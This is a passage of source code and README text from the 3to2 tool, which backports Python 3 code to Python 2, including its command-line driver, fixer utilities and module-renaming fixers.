    args=trailer< '(' arglist< any* > ')' > > |
    imported=import_from< 'from' 'functools' 'import' 'reduce' > |
    import_from< 'from' 'functools' 'import' import_as_names< any* in_list='reduce' any* > >
    """

    def transform(self, node, results):
        syms = self.syms
        args, imported = (results.get("args"), results.get("imported"))
        in_list = results.get("in_list")
        if imported:
            # 'from functools import reduce' standing alone: remove the
            # whole statement, tidying semicolons/newlines around it.
            # (Locals renamed from next/prev, which shadowed builtins.)
            next_node = imported.next_sibling
            prev_node = imported.prev_sibling
            parent = imported.parent
            if next_node and next_node.type == token.SEMI:
                next_node.remove()
                next_node = imported.next_sibling
            imported.remove()
            if next_node is not None and next_node.type == token.NEWLINE:
                # nothing after from_import on the line
                if prev_node is not None:
                    if prev_node.type == token.SEMI:
                        prev_node.remove()
                elif parent.next_sibling is not None:
                    # nothing before from_import either: drop the line
                    parent.next_sibling.prefix = imported.prefix
                    parent.remove()
        elif args:
            # functools.reduce(...) --> reduce(...)
            args = args.clone()
            prefix = node.prefix
            return Node(syms.power, [Leaf(token.NAME, "reduce"), args],
                        prefix=prefix)
        elif in_list:
            # 'reduce' inside 'from functools import a, reduce, b':
            # remove the name plus one neighboring comma.
            next_node = in_list.next_sibling
            if next_node is not None:
                if next_node.type == token.COMMA:
                    next_node.remove()
            else:
                prev_node = in_list.prev_sibling
                if prev_node is not None:
                    if prev_node.type == token.COMMA:
                        prev_node.remove()
            in_list.remove()
Abstract
========
lib3to2 is a set of fixers that are intended to backport code written for
Python version 3.x into Python version 2.x. The final target 2.x version is
the latest version of the 2.7 branch, as that is the last release in the Python
2.x branch. Some attempts have been made, however, to make code compatible as
much as possible with versions of Python back to 2.5, and bug reports are still
welcome for Python features only present in 2.6+ that are not addressed by
lib3to2.
This project came about as a Google Summer of Code (TM) project in 2009.
Status
======
Because of the nature of the subject matter, 3to2 is not perfect, so check all
output manually. 3to2 does the bulk of the work, but there is code that simply
cannot be converted into a Python 2 equivalent for one reason or another.
3to2 will either produce working Python 2 code or warn about why it did not.
Any other behavior is a bug and should be reported.
lib3to2's fixers are somewhat well-tested individually, but there is no testing
that is done on interactions between multiple fixers, so most of the bugs in
the future will likely be found there.
Intention
=========
lib3to2 is intended to be a tool in the process of developing code that is
backwards-compatible between Python 3 and Python 2. It is not intended to be a
complete solution for directly backporting Python 3 code, though it can often
be used for this purpose without issue. Sufficiently large packages should be
developed with lib3to2 used throughout the process to keep backwards-
incompatible code from becoming too embedded.
There are some features of Python 3 that have no equivalent in Python 2, and
though lib3to2 tries to fix as many of these as it can, some features are
beyond its grasp. This is especially true of features not readily detectable
by their syntax alone and extremely subtle features, so make sure that code
using lib3to2 is thoroughly tested.
Repository
==========
lib3to2 resides at http://bitbucket.org/amentajo/lib3to2, where the bug tracker
can be found at http://bitbucket.org/amentajo/lib3to2/issues
Usage
=====
Run "./3to2" to convert stdin ("-"), files or directories given as
arguments. By default, the tool outputs a unified diff-formatted patch on
standard output and a "what was changed" summary on standard error, but the
"-w" option can be given to write back converted files, creating
".bak"-named backup files.
If you are root, you can also install with "./setup.py build" and
"./setup.py install" ("make install" does this for you).
This branch of 3to2 must be run with Python 3.
To install locally (used for running tests as a non-privileged user), the
scripts assume you are using python3.1. Modify accordingly if you are not.
Relationship with lib2to3
=========================
Some of the fixers for lib3to2 are directly copy-pasted from their 2to3
equivalent, with the element of PATTERN and the corresponding transformation
switched places. Most fixers written for this program with a corresponding
2to3 fixer started from a clone of the 2to3 fixer, which was then modified to
work in reverse. I do not claim original authorship of these fixers, but I do
claim that they will work for 3to2, independent of how they work for 2to3.
In addition, this program depends on lib2to3 to implement fixers, test cases,
refactoring, and grammar. Some portions of lib2to3 were modified to be more
generic to support lib3to2's calls.
You should use the latest version of lib2to3 from the Python sandbox rather
than the version (if any) that comes with Python. As a convenience,
"two2three" from the Python Package Index is a recent enough version of lib2to3
renamed to avoid conflicts. To use this package, replace all usage of
"lib2to3" with "two2three" within the 3to2 source files after installing
"two2three" from the PyPI. Depending on the developer's mood, a version of
3to2 may be provided with this change already made. | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/README | README |
import sys
import os
import difflib
import logging
import shutil
import optparse
from lib2to3 import refactor
from lib2to3 import pygram
def diff_texts(a, b, filename):
    """Return a unified diff of two strings."""
    return difflib.unified_diff(a.splitlines(), b.splitlines(),
                                filename, filename,
                                "(original)", "(refactored)",
                                lineterm="")
class StdoutRefactoringTool(refactor.MultiprocessRefactoringTool):
    """
    Prints output to stdout.

    Subclass of the lib2to3 refactoring tool that collects errors,
    writes ".bak" backups, and shows unified diffs of its changes.
    """

    def __init__(self, fixers, options, explicit, nobackups, show_diffs):
        # nobackups: skip creating "<file>.bak" before overwriting.
        # show_diffs: print a unified diff for each refactored file.
        self.nobackups = nobackups
        self.show_diffs = show_diffs
        super(StdoutRefactoringTool, self).__init__(fixers, options, explicit)
        self.driver.grammar = pygram.python_grammar_no_print_statement

    def refactor_string(self, data, name):
        """Override to keep print statements out of the grammar"""
        try:
            tree = self.driver.parse_string(data)
        except Exception as err:
            self.log_error("Can't parse %s: %s: %s",
                           name, err.__class__.__name__, err)
            return
        self.log_debug("Refactoring %s", name)
        self.refactor_tree(tree, name)
        return tree

    def log_error(self, msg, *args, **kwargs):
        # Record the error for later inspection, then log it normally.
        self.errors.append((msg, args, kwargs))
        self.logger.error(msg, *args, **kwargs)

    def write_file(self, new_text, filename, old_text, encoding):
        if not self.nobackups:
            # Make backup
            backup = filename + ".bak"
            if os.path.lexists(backup):
                try:
                    os.remove(backup)
                except os.error as err:
                    self.log_message("Can't remove backup %s", backup)
            try:
                os.rename(filename, backup)
            except os.error as err:
                self.log_message("Can't rename %s to %s", filename, backup)
        # Actually write the new file
        write = super(StdoutRefactoringTool, self).write_file
        write(new_text, filename, old_text, encoding)
        if not self.nobackups:
            # Preserve the original file's permission bits.
            shutil.copymode(backup, filename)

    def print_output(self, old, new, filename, equal):
        if equal:
            self.log_message("No changes to %s", filename)
        else:
            self.log_message("Refactored %s", filename)
            if self.show_diffs:
                for line in diff_texts(old, new, filename):
                    print(line)
def warn(msg):
    """Emit a warning message on standard error."""
    sys.stderr.write("WARNING: %s\n" % (msg,))
def main(fixer_pkg, args=None):
    """Main program.

    Args:
        fixer_pkg: the name of a package where the fixers are located.
        args: optional; a list of command line arguments. If omitted,
              sys.argv[1:] is used.

    Returns a suggested exit status (0, 1, 2).
    """
    # Set up option parser
    parser = optparse.OptionParser(usage="3to2 [options] file|dir ...")
    parser.add_option("-d", "--doctests_only", action="store_true",
                      help="Fix up doctests only")
    parser.add_option("-f", "--fix", action="append", default=[],
                      help="Each FIX specifies a transformation; default: all")
    parser.add_option("-j", "--processes", action="store", default=1,
                      type="int", help="Run 3to2 concurrently")
    parser.add_option("-x", "--nofix", action="append", default=[],
                      help="Prevent a fixer from being run.")
    parser.add_option("-l", "--list-fixes", action="store_true",
                      help="List available transformations (fixes/fix_*.py)")
    parser.add_option("-v", "--verbose", action="store_true",
                      help="More verbose logging")
    parser.add_option("-w", "--write", action="store_true",
                      help="Write back modified files")
    parser.add_option("-n", "--nobackups", action="store_true", default=False,
                      help="Don't write backups for modified files.")
    parser.add_option("--no-diffs", action="store_true",
                      help="Don't show diffs of the refactoring")
    # Parse command line arguments
    refactor_stdin = False
    options, args = parser.parse_args(args)
    if not options.write and options.no_diffs:
        warn("not writing files and not printing diffs; that's not very useful")
    if not options.write and options.nobackups:
        parser.error("Can't use -n without -w")
    if options.list_fixes:
        print("Available transformations for the -f/--fix option:")
        for fixname in refactor.get_all_fix_names(fixer_pkg):
            print(fixname)
        # -l with no files is a valid invocation: just list and exit.
        if not args:
            return 0
    if not args:
        print("At least one file or directory argument required.", file=sys.stderr)
        print("Use --help to show usage.", file=sys.stderr)
        return 2
    if "-" in args:
        # "-" means: read source from stdin, write result to stdout.
        refactor_stdin = True
        if options.write:
            print("Can't write to stdin.", file=sys.stderr)
            return 2
    # Set up logging handler
    level = logging.DEBUG if options.verbose else logging.INFO
    logging.basicConfig(format='%(name)s: %(message)s', level=level)
    # Initialize the refactoring tool
    avail_fixes = set(refactor.get_fixers_from_package(fixer_pkg))
    unwanted_fixes = set(fixer_pkg + ".fix_" + fix for fix in options.nofix)
    explicit = set()
    if options.fix:
        all_present = False
        for fix in options.fix:
            if fix == "all":
                all_present = True
            else:
                explicit.add(fixer_pkg + ".fix_" + fix)
        # "-f all" plus explicit names runs everything; otherwise only the
        # explicitly requested fixers run.
        requested = avail_fixes.union(explicit) if all_present else explicit
    else:
        requested = avail_fixes.union(explicit)
    fixer_names = requested.difference(unwanted_fixes)
    rt = StdoutRefactoringTool(sorted(fixer_names), None, sorted(explicit),
                               options.nobackups, not options.no_diffs)
    # Refactor all files and directories passed as arguments
    if not rt.errors:
        if refactor_stdin:
            rt.refactor_stdin()
        else:
            try:
                rt.refactor(args, options.write, options.doctests_only,
                            options.processes)
            except refactor.MultiprocessingUnsupported:
                assert options.processes > 1
                print("Sorry, -j isn't supported on this platform.", file=sys.stderr)
                return 1
        rt.summarize()
    # Return error status (0 if rt.errors is zero)
    return int(bool(rt.errors))
from lib2to3.pygram import token, python_symbols as syms
from lib2to3.pytree import Leaf, Node
from lib2to3.fixer_util import *
def Star(prefix=None):
    """Return a new '*' (STAR) leaf, optionally carrying *prefix*."""
    leaf = Leaf(token.STAR, "*")
    if prefix is not None:
        leaf.prefix = prefix
    return leaf
def DoubleStar(prefix=None):
    """Return a new '**' (DOUBLESTAR) leaf, optionally carrying *prefix*."""
    leaf = Leaf(token.DOUBLESTAR, "**")
    if prefix is not None:
        leaf.prefix = prefix
    return leaf
def Minus(prefix=None):
    """Return a new '-' (MINUS) leaf, optionally carrying *prefix*."""
    leaf = Leaf(token.MINUS, "-")
    if prefix is not None:
        leaf.prefix = prefix
    return leaf
def commatize(leafs):
    """
    Accepts/turns: (Name, Name, ..., Name, Name)
    Returns/into: (Name, Comma, Name, Comma, ..., Name, Comma, Name)

    An empty input yields an empty list; the previous implementation
    raised IndexError on [] because it unconditionally deleted the
    trailing comma.
    """
    new_leafs = []
    for leaf in leafs:
        new_leafs.append(leaf)
        new_leafs.append(Comma())
    if new_leafs:
        # Drop the comma that was appended after the final leaf.
        del new_leafs[-1]
    return new_leafs
def indentation(node):
    """
    Returns the indentation for this node
    Iff a node is in a suite, then it has indentation.
    """
    # Climb up until this node is a direct child of a suite (or the root).
    while node.parent is not None and node.parent.type != syms.suite:
        node = node.parent
    if node.parent is None:
        # Top-level node: no indentation.
        return ""
    # The first three children of a suite are NEWLINE, INDENT, (some other node)
    # INDENT.value contains the indentation for this suite
    # anything after (some other node) has the indentation as its prefix.
    if node.type == token.INDENT:
        return node.value
    elif node.prev_sibling is not None and node.prev_sibling.type == token.INDENT:
        return node.prev_sibling.value
    elif node.prev_sibling is None:
        # First child of the suite is the NEWLINE; it carries no indentation.
        return ""
    else:
        return node.prefix
def indentation_step(node):
    """
    Dirty little trick to get the difference between each indentation level
    Implemented by finding the shortest indentation string
    (technically, the "least" of all of the indentation strings, but
    tabs and spaces mixed won't get this far, so those are synonymous.)
    """
    root = find_root(node)
    # Gather the text of every INDENT token anywhere in the tree.
    indents = set(leaf.value for leaf in root.pre_order()
                  if leaf.type == token.INDENT)
    if indents:
        return min(indents)
    # Nothing is indented anywhere, so we get to pick what we want.
    return " "  # four spaces is a popular convention
def suitify(parent):
    """
    Turn the stuff after the first colon in parent's children
    into a suite, if it wasn't already
    """
    for node in parent.children:
        if node.type == syms.suite:
            # already in the prefered format, do nothing
            return
    # One-liners have no suite node, we have to fake one up
    for i, node in enumerate(parent.children):
        if node.type == token.COLON:
            break
    else:
        raise ValueError("No class suite and no ':'!")
    # Move everything into a suite node
    # ('node' is the COLON leaf here, so indentation() is computed relative
    # to the statement that owns the colon.)
    suite = Node(syms.suite, [Newline(), Leaf(token.INDENT, indentation(node) + indentation_step(node))])
    one_node = parent.children[i+1]
    one_node.remove()
    one_node.prefix = ''
    suite.append_child(one_node)
    parent.append_child(suite)
def NameImport(package, as_name=None, prefix=None):
    """
    Accepts a package (Name node), name to import it as (string), and
    optional prefix and returns a node:
    import <package> [as <as_name>]
    """
    if prefix is None:
        prefix = ""
    children = [Name("import", prefix=prefix), package]
    if as_name is not None:
        children.append(Name("as", prefix=" "))
        children.append(Name(as_name, prefix=" "))
    return Node(syms.import_name, children)
# Compound statements whose suites may contain import statements.
_compound_stmts = (syms.if_stmt, syms.while_stmt, syms.for_stmt, syms.try_stmt, syms.with_stmt)
# The two grammar nodes that represent import statements.
_import_stmts = (syms.import_name, syms.import_from)
def import_binding_scope(node):
    """
    Generator yields all nodes for which a node (an import_stmt) has scope
    The purpose of this is for a call to _find() on each of them
    """
    # import_name / import_from are small_stmts
    assert node.type in _import_stmts
    test = node.next_sibling
    # A small_stmt can only be followed by a SEMI or a NEWLINE.
    while test.type == token.SEMI:
        nxt = test.next_sibling
        # A SEMI can only be followed by a small_stmt or a NEWLINE
        if nxt.type == token.NEWLINE:
            break
        else:
            yield nxt
        # A small_stmt can only be followed by either a SEMI or a NEWLINE
        test = nxt.next_sibling
    # Covered all subsequent small_stmts after the import_stmt
    # Now to cover all subsequent stmts after the parent simple_stmt
    parent = node.parent
    assert parent.type == syms.simple_stmt
    test = parent.next_sibling
    while test is not None:
        # Yes, this will yield NEWLINE and DEDENT. Deal with it.
        yield test
        test = test.next_sibling
    context = parent.parent
    # Recursively yield nodes following imports inside of a if/while/for/try/with statement
    if context.type in _compound_stmts:
        # import is in a one-liner
        c = context
        while c.next_sibling is not None:
            yield c.next_sibling
            c = c.next_sibling
        context = context.parent
    # Can't chain one-liners on one line, so that takes care of that.
    p = context.parent
    if p is None:
        return
    # in a multi-line suite
    # Climb outward through enclosing compound statements, yielding each
    # later sibling suite at every level.
    while p.type in _compound_stmts:
        if context.type == syms.suite:
            yield context
        context = context.next_sibling
        if context is None:
            context = p.parent
            p = context.parent
            if p is None:
                break
def ImportAsName(name, as_name, prefix=None):
    """Return an import_as_name node: '<name> as <as_name>'."""
    node = Node(syms.import_as_name,
                [Name(name), Name("as", prefix=" "), Name(as_name, prefix=" ")])
    if prefix is not None:
        node.prefix = prefix
    return node
def future_import(feature, node):
    """Add 'from __future__ import <feature>' to the tree containing *node*,
    unless that feature is already imported."""
    root = find_root(node)
    if does_tree_import("__future__", feature, node):
        return
    insert_pos = 0
    # Skip past a module docstring, if present: insert after the first
    # top-level simple_stmt whose first child is a STRING.
    for idx, node in enumerate(root.children):
        if node.type == syms.simple_stmt and node.children and \
           node.children[0].type == token.STRING:
            insert_pos = idx + 1
            break
    # Steal the prefix (comments/whitespace) of the first real statement
    # after the insert position so the new import keeps the file readable.
    for thing_after in root.children[insert_pos:]:
        if thing_after.type == token.NEWLINE:
            insert_pos += 1
            continue
        prefix = thing_after.prefix
        thing_after.prefix = ""
        break
    else:
        prefix = ""
    import_ = FromImport("__future__", [Leaf(token.NAME, feature, prefix=" ")])
    children = [import_, Newline()]
    root.insert_child(insert_pos, Node(syms.simple_stmt, children, prefix=prefix))
def parse_args(arglist, scheme):
    """
    Parse a list of argument nodes into a dict mapping each slot name in
    *scheme* to its argument node (or None if absent).  Keyword arguments
    (argument< NAME '=' any >) are stored under their own name; positional
    arguments are stored under the scheme slot at the same index.
    """
    positional = [node for node in arglist if node.type != token.COMMA]
    mapping = dict.fromkeys(scheme)
    for index, arg in enumerate(positional):
        if arg.type == syms.argument and arg.children[1].type == token.EQUAL:
            # Keyword argument: key comes from the NAME, value after the '='.
            mapping[arg.children[0].value] = arg.children[2]
        else:
            mapping[scheme[index]] = arg
    return mapping
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, String, FromImport, Newline, Comma
from ..fixer_util import token, syms, Leaf, Node, Star, indentation, ImportAsName
# Names re-exported from Tkinter/Tkconstants by several of the Tk dialog
# modules below (FileDialog, SimpleDialog, tkSimpleDialog).
TK_BASE_NAMES = ('ACTIVE', 'ALL', 'ANCHOR', 'ARC','BASELINE', 'BEVEL', 'BOTH',
                 'BOTTOM', 'BROWSE', 'BUTT', 'CASCADE', 'CENTER', 'CHAR',
                 'CHECKBUTTON', 'CHORD', 'COMMAND', 'CURRENT', 'DISABLED',
                 'DOTBOX', 'E', 'END', 'EW', 'EXCEPTION', 'EXTENDED', 'FALSE',
                 'FIRST', 'FLAT', 'GROOVE', 'HIDDEN', 'HORIZONTAL', 'INSERT',
                 'INSIDE', 'LAST', 'LEFT', 'MITER', 'MOVETO', 'MULTIPLE', 'N',
                 'NE', 'NO', 'NONE', 'NORMAL', 'NS', 'NSEW', 'NUMERIC', 'NW',
                 'OFF', 'ON', 'OUTSIDE', 'PAGES', 'PIESLICE', 'PROJECTING',
                 'RADIOBUTTON', 'RAISED', 'READABLE', 'RIDGE', 'RIGHT',
                 'ROUND', 'S', 'SCROLL', 'SE', 'SEL', 'SEL_FIRST', 'SEL_LAST',
                 'SEPARATOR', 'SINGLE', 'SOLID', 'SUNKEN', 'SW', 'StringTypes',
                 'TOP', 'TRUE', 'TclVersion', 'TkVersion', 'UNDERLINE',
                 'UNITS', 'VERTICAL', 'W', 'WORD', 'WRITABLE', 'X', 'Y', 'YES',
                 'wantobjects')
# Maps each candidate py2k module to the public names it provides; used by
# new_package() to decide which py2k module supplies an imported name.
PY2MODULES = {
    'urllib2' : (
        'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',
        'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',
        'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',
        'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',
        'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',
        'HTTPHandler', 'HTTPPasswordMgr',
        'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',
        'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',
        'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',
        'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',
        'build_opener', 'install_opener', 'parse_http_list',
        'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),
    'urllib' : (
        'ContentTooShortError', 'FancyURLopener','URLopener',
        'basejoin', 'ftperrors', 'getproxies',
        'getproxies_environment', 'localhost', 'pathname2url',
        'quote', 'quote_plus', 'splitattr', 'splithost',
        'splitnport', 'splitpasswd', 'splitport', 'splitquery',
        'splittag', 'splittype', 'splituser', 'splitvalue',
        'thishost', 'unquote', 'unquote_plus', 'unwrap',
        'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',
        'urlretrieve',),
    'urlparse' : (
        'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',
        'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),
    'dbm' : (
        'ndbm', 'gnu', 'dumb'),
    'anydbm' : (
        'error', 'open'),
    'whichdb' : (
        'whichdb',),
    'BaseHTTPServer' : (
        'BaseHTTPRequestHandler', 'HTTPServer'),
    'CGIHTTPServer' : (
        'CGIHTTPRequestHandler',),
    'SimpleHTTPServer' : (
        'SimpleHTTPRequestHandler',),
    'FileDialog' : TK_BASE_NAMES + (
        'FileDialog', 'LoadFileDialog', 'SaveFileDialog',
        'dialogstates', 'test'),
    'tkFileDialog' : (
        'Directory', 'Open', 'SaveAs', '_Dialog', 'askdirectory',
        'askopenfile', 'askopenfilename', 'askopenfilenames',
        'askopenfiles', 'asksaveasfile', 'asksaveasfilename'),
    'SimpleDialog' : TK_BASE_NAMES + (
        'SimpleDialog',),
    'tkSimpleDialog' : TK_BASE_NAMES + (
        'askfloat', 'askinteger', 'askstring', 'Dialog'),
    'SimpleXMLRPCServer' : (
        'CGIXMLRPCRequestHandler', 'SimpleXMLRPCDispatcher',
        'SimpleXMLRPCRequestHandler', 'SimpleXMLRPCServer',
        'list_public_methods', 'remove_duplicates',
        'resolve_dotted_attribute'),
    'DocXMLRPCServer' : (
        'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',
        'DocXMLRPCServer', 'ServerHTMLDoc','XMLRPCDocGenerator'),
    }
# Maps each py3k dotted module name to the tuple of py2k modules whose
# contents it merged.  A '.__init__' attr means the py3k top-level package
# itself absorbed those py2k modules.
MAPPING = { 'urllib.request' :
                ('urllib2', 'urllib'),
            'urllib.error' :
                ('urllib2', 'urllib'),
            'urllib.parse' :
                ('urllib2', 'urllib', 'urlparse'),
            'dbm.__init__' :
                ('anydbm', 'whichdb'),
            'http.server' :
                ('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),
            'tkinter.filedialog' :
                ('tkFileDialog', 'FileDialog'),
            'tkinter.simpledialog' :
                ('tkSimpleDialog', 'SimpleDialog'),
            'xmlrpc.server' :
                ('DocXMLRPCServer', 'SimpleXMLRPCServer'),
            }
# Template fragments combined by build_import_pattern() below.
# helps match 'http', as in 'from http.server import ...'
simple_name = "name='%s'"
# helps match 'server', as in 'from http.server import ...'
simple_attr = "attr='%s'"
# helps match 'HTTPServer', as in 'from http.server import HTTPServer'
simple_using = "using='%s'"
# helps match 'urllib.request', as in 'import urllib.request'
dotted_name = "dotted_name=dotted_name< %s '.' %s >"
# helps match 'http.server', as in 'http.server.HTTPServer(...)'
power_twoname = "pow=power< %s trailer< '.' %s > trailer< '.' using=any > any* >"
# helps match 'dbm.whichdb', as in 'dbm.whichdb(...)'
power_onename = "pow=power< %s trailer< '.' using=any > any* >"
# helps match 'from http.server import HTTPServer'
# also helps match 'from http.server import HTTPServer, SimpleHTTPRequestHandler'
# also helps match 'from http.server import *'
from_import = "from_import=import_from< 'from' %s 'import' (import_as_name< using=any 'as' renamed=any> | in_list=import_as_names< using=any* > | using='*' | using=NAME) >"
# helps match 'import urllib.request'
name_import = "name_import=import_name< 'import' (%s | in_list=dotted_as_names< imp_list=any* >) >"
#############
# WON'T FIX #
#############
# helps match 'import urllib.request as name'
name_import_rename = "name_import_rename=dotted_as_name< %s 'as' renamed=any >"
# helps match 'from http import server'
from_import_rename = "from_import_rename=import_from< 'from' %s 'import' (%s | import_as_name< %s 'as' renamed=any > | in_list=import_as_names< any* (%s | import_as_name< %s 'as' renamed=any >) any* >) >"
def all_modules_subpattern():
    """
    Build a single pattern alternation matching every py3k module name in
    MAPPING: each dotted name, plus the bare top-level name for modules
    whose attr is '__init__'.
    """
    pairs = [mod.split(".") for mod in MAPPING]
    dotted = [dotted_name % (simple_name % (name), simple_attr % (attr))
              for name, attr in pairs]
    bare = [simple_name % (name) for name, attr in pairs if attr == "__init__"]
    return "( " + " | ".join(dotted) + " | " + " | ".join(bare) + " )"
def all_candidates(name, attr, MAPPING=MAPPING):
    """
    Return every py2k candidate module for the given name.attr.
    For '__init__' attrs the py3k top-level package itself is also a
    valid candidate.
    """
    dotted = name + '.' + attr
    assert dotted in MAPPING, "No matching package found."
    candidates = MAPPING[dotted]
    if attr == '__init__':
        candidates = candidates + (name,)
    return candidates
def new_package(name, attr, using, MAPPING=MAPPING, PY2MODULES=PY2MODULES):
    """
    Return the py2k candidate module for name.attr that provides the name
    *using*, or None if no candidate does.
    """
    for candidate in all_candidates(name, attr, MAPPING):
        if using in PY2MODULES[candidate]:
            return candidate
    return None
def build_import_pattern(mapping1, mapping2):
    """
    mapping1: A dict mapping py3k modules to all possible py2k replacements
    mapping2: A dict mapping py2k modules to the things they do
    This builds a HUGE pattern to match all ways that things can be imported
    """
    # Matches "from <any known py3k module> import ..." in one alternation.
    yield from_import % (all_modules_subpattern())
    for py3k_mod in mapping1:
        base, sub = py3k_mod.split('.')
        pat_base = simple_name % (base)
        pat_sub = simple_attr % (sub)
        pat_dotted = dotted_name % (pat_base, pat_sub)
        yield name_import % (pat_dotted)
        yield power_twoname % (pat_base, pat_sub)
        if sub == '__init__':
            # e.g. plain "import dbm" / "dbm.whichdb(...)"
            yield name_import % (pat_base)
            yield power_onename % (pat_base)
        yield name_import_rename % (pat_dotted)
        yield from_import_rename % (pat_base, pat_sub, pat_sub, pat_sub, pat_sub)
def name_import_replacement(name, attr):
    """Return an import_name node importing every py2k candidate for
    name.attr, e.g. 'import urllib2, urllib'."""
    children = [Name("import")]
    for candidate in all_candidates(name.value, attr.value):
        children.append(Name(candidate, prefix=" "))
        children.append(Comma())
    # Remove the trailing comma.
    del children[-1]
    return Node(syms.import_name, children)
class FixImports2(fixer_base.BaseFix):
    """Rewrite imports of py3k modules that merged *several* py2k modules
    (e.g. urllib.request -> urllib2 + urllib), picking the right py2k module
    for each imported name."""

    run_order = 4

    PATTERN = " | \n".join(build_import_pattern(MAPPING, PY2MODULES))

    def transform(self, node, results):
        # The patterns dictate which of these names will be defined
        name = results.get("name")
        attr = results.get("attr")
        if attr is None:
            attr = Name("__init__")
        using = results.get("using")
        in_list = results.get("in_list")
        imp_list = results.get("imp_list")
        power = results.get("pow")
        before = results.get("before")
        after = results.get("after")
        d_name = results.get("dotted_name")
        # An import_stmt is always contained within a simple_stmt
        simple_stmt = node.parent
        # The parent is useful for adding new import_stmts
        parent = simple_stmt.parent
        idx = parent.children.index(simple_stmt)
        if any((results.get("from_import_rename") is not None,
                results.get("name_import_rename") is not None)):
            # Renaming imports bind a single name; splitting them across
            # several py2k modules is ambiguous, so refuse.
            self.cannot_convert(node, reason="ambiguity: import binds a single name")
        elif using is None and not in_list:
            # import urllib.request, single-name import
            replacement = name_import_replacement(name, attr)
            replacement.prefix = node.prefix
            node.replace(replacement)
        elif using is None:
            # import ..., urllib.request, math, http.sever, ...
            for d_name in imp_list:
                if d_name.type == syms.dotted_name:
                    name = d_name.children[0]
                    attr = d_name.children[2]
                elif d_name.type == token.NAME and d_name.value + ".__init__" in MAPPING:
                    name = d_name
                    attr = Name("__init__")
                else:
                    continue
                if name.value + "." + attr.value not in MAPPING:
                    continue
                candidates = all_candidates(name.value, attr.value)
                children = [Name("import")]
                for c in candidates:
                    children.append(Name(c, prefix=" "))
                    children.append(Comma())
                children.pop()
                # Put in the new statement.
                indent = indentation(simple_stmt)
                next_stmt = Node(syms.simple_stmt, [Node(syms.import_name, children), Newline()])
                parent.insert_child(idx+1, next_stmt)
                parent.insert_child(idx+1, Leaf(token.INDENT, indent))
                # Remove the old imported name
                test_comma = d_name.next_sibling
                if test_comma and test_comma.type == token.COMMA:
                    test_comma.remove()
                elif test_comma is None:
                    test_comma = d_name.prev_sibling
                    if test_comma and test_comma.type == token.COMMA:
                        test_comma.remove()
                d_name.remove()
                if not in_list.children:
                    # Every name in the list was replaced; drop the now-empty
                    # original statement.
                    simple_stmt.remove()
        elif in_list is not None:
            ##########################################################
            # "from urllib.request import urlopen, urlretrieve, ..." #
            # Replace one import statement with potentially many.    #
            ##########################################################
            packages = dict([(n,[]) for n in all_candidates(name.value,
                                                            attr.value)])
            # Figure out what names need to be imported from what
            # Add them to a dict to be parsed once we're completely done
            for imported in using:
                if imported.type == token.COMMA:
                    continue
                if imported.type == syms.import_as_name:
                    test_name = imported.children[0].value
                    if len(imported.children) > 2:
                        # 'as' whatever
                        rename = imported.children[2].value
                    else:
                        rename = None
                elif imported.type == token.NAME:
                    test_name = imported.value
                    rename = None
                pkg = new_package(name.value, attr.value, test_name)
                packages[pkg].append((test_name, rename))
            # Parse the dict to create new import statements to replace this one
            imports = []
            for new_pkg, names in packages.items():
                if not names:
                    # Didn't import anything from that package, move along
                    continue
                new_names = []
                for test_name, rename in names:
                    if rename is None:
                        new_names.append(Name(test_name, prefix=" "))
                    else:
                        new_names.append(ImportAsName(test_name, rename, prefix=" "))
                    new_names.append(Comma())
                new_names.pop()
                imports.append(FromImport(new_pkg, new_names))
            # Replace this import statement with one of the others
            replacement = imports.pop()
            replacement.prefix = node.prefix
            node.replace(replacement)
            indent = indentation(simple_stmt)
            # Add the remainder of the imports as new statements.
            while imports:
                next_stmt = Node(syms.simple_stmt, [imports.pop(), Newline()])
                parent.insert_child(idx+1, next_stmt)
                parent.insert_child(idx+1, Leaf(token.INDENT, indent))
        elif using.type == token.STAR:
            # from urllib.request import *
            # Emit a star import from every candidate module.
            nodes = [FromImport(pkg, [Star(prefix=" ")]) for pkg in
                     all_candidates(name.value, attr.value)]
            replacement = nodes.pop()
            replacement.prefix = node.prefix
            node.replace(replacement)
            indent = indentation(simple_stmt)
            while nodes:
                next_stmt = Node(syms.simple_stmt, [nodes.pop(), Newline()])
                parent.insert_child(idx+1, next_stmt)
                parent.insert_child(idx+1, Leaf(token.INDENT, indent))
        elif power is not None:
            # urllib.request.urlopen
            # Replace it with urllib2.urlopen
            pkg = new_package(name.value, attr.value, using.value)
            # Remove the trailer node that contains attr.
            if attr.parent:
                attr.parent.remove()
            name.replace(Name(pkg, prefix=name.prefix))
        elif using.type == token.NAME:
            # from urllib.request import urlopen
            pkg = new_package(name.value, attr.value, using.value)
            if attr.value == "__init__" and pkg == name.value:
                # Replacing "from abc import xyz" with "from abc import xyz"
                # Just leave it alone so as not to mess with other fixers
                return
            else:
                node.replace(FromImport(pkg, [using]))
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, is_probably_builtin, Newline, does_tree_import
from lib2to3.pygram import python_symbols as syms
from lib2to3.pgen2 import token
from lib2to3.pytree import Node, Leaf
from ..fixer_util import NameImport
# used in simple_mapping_to_pattern()
# One-to-one renames: each py3k module name maps to exactly one py2k name.
MAPPING = {"reprlib": "repr",
           "winreg": "_winreg",
           "configparser": "ConfigParser",
           "copyreg": "copy_reg",
           "queue": "Queue",
           "socketserver": "SocketServer",
           "_markupbase": "markupbase",
           "test.support": "test.test_support",
           "dbm.bsd": "dbhash",
           "dbm.ndbm": "dbm",
           "dbm.dumb": "dumbdbm",
           "dbm.gnu": "gdbm",
           "html.parser": "HTMLParser",
           "html.entities": "htmlentitydefs",
